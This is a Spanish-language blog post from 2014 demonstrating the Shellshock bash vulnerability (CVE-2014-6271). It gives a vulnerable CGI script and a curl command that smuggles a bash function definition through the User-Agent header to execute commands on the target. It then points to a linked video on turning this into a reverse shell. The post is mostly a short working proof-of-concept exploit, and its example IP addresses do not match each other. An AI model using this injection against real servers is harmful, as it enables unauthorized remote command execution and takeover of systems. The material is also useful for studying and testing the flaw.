jueves, 2 de octubre de 2014

Video Demo Shellshock Exploit (CVE-2014-6271)

Demo de "Shellshock", la más reciente vulnerabilidad en el shell BASH que afecta a miles y miles de sistemas basados en Linux y UNIX. 

Aprovechando la vulnerabilidad Shellshock es posible generar un "reverse shell" para tomar control remoto de la víctima.

PoC:

1. Se tiene un CGI vulnerable. Por ejemplo: http://198.168.1.1/cgi-bin/victim.cgi

2. Código del CGI vulnerable:

#!/bin/bash
echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>Demo Shellshock Exploit (CVE-2014-6271)</title>'
echo '</head>'
echo '<body>'
echo '<pre>'
/usr/bin/env
echo '</pre>'
echo '</body>'
echo '</html>'
exit 0

3. En el equipo de cómputo del atacante ejecutar:

curl -A "() { foo;};echo;/bin/echo vulnerable" http://192.168.1.1/cgi-bin/victim.cgi

Si la ejecución del comando es exitosa y se tiene la salida "vulnerable", se valida la vulnerabilidad con lo cual es posible inyectar y ejecutar comandos en la víctima. Por ejemplo para obtener un "reverse shell".

El siguiente videoxploit detalla la forma de obtener un "reverse shell" aprovechando Shellshock.

https://www.youtube.com/watch?v=a6FmnUSEkKM